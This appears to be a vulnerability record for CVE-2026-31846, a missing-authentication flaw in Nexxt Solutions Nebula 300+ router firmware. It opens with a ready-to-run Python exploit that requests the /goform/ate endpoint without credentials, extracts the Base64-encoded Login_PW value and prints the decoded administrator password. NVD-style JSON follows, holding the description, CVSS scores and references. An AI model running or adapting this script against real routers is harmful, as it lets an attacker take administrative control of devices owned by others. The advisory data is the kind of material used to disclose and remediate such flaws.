CVE-2026-31846

import requests import base64 import re def exploit(target_ip): # The vulnerable endpoint url = f"http://{target_ip}/goform/ate" try: # Send request without authentication headers response = requests.get(url, timeout=10) if response.status_code == 200: print("[+] Successfully retrieved data from /goform/ate") data = response.text # Search for the Login_PW parameter (format may vary, usually key=value) # This regex looks for Login_PW followed by an equals sign and captures the value match = re.search(r'Login_PW=([A-Za-z0-9+/=]+)', data) if match: encoded_pw = match.group(1) print(f"[+] Found Base64 encoded password: {encoded_pw}") try: # Decode the Base64 password decoded_pw = base64.b64decode(encoded_pw).decode('utf-8') print(f"[!] Decoded Administrator Password: {decoded_pw}") except Exception as e: print(f"[-] Error decoding password: {e}") else: print("[-] Could not find Login_PW in response.") print("[DEBUG] Response content:") print(data) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": # Replace with the target IP address target = "192.168.1.1" print(f"[*] Attempting to exploit CVE-2026-31846 on {target}") exploit(target)

{"cve": {"id": "CVE-2026-31846", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-03-23T12:16:07.267", "lastModified": "2026-05-19T15:50:41.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authentication in the /goform/ate endpoint in Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 allows an adjacent unauthenticated attacker to retrieve sensitive device information, including the administrator password. The endpoint returns a raw response containing parameters such as Login_PW, which is Base64-encoded. An attacker can decode this value to obtain valid administrative credentials and authenticate to the device."}, {"lang": "es", "value": "Una vulnerabilidad de divulgación de credenciales no autenticada en el endpoint /goform/ate del firmware Nexxt Solutions Nebula 300+ hasta Nebula300+_v12.01.01.37 permite a un atacante adyacente obtener la contraseña de administrador en formato codificado en Base64 a través de una solicitud HTTP manipulada. La credencial recuperada puede ser utilizada para autenticarse en el dispositivo y facilita un compromiso adicional cuando se combina con otras debilidades presentes en el firmware."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:C/I:N/A:N", "baseScore": 6.1, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.5, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://nexxt-connectivity-frontend.s3.amazonaws.com/media/docs/Nebula300+_v12.01.01.37.zip", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}, {"url": "https://www.nexxtsolutions.com/connectivity/internal-products/ARN02304U6/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}]}}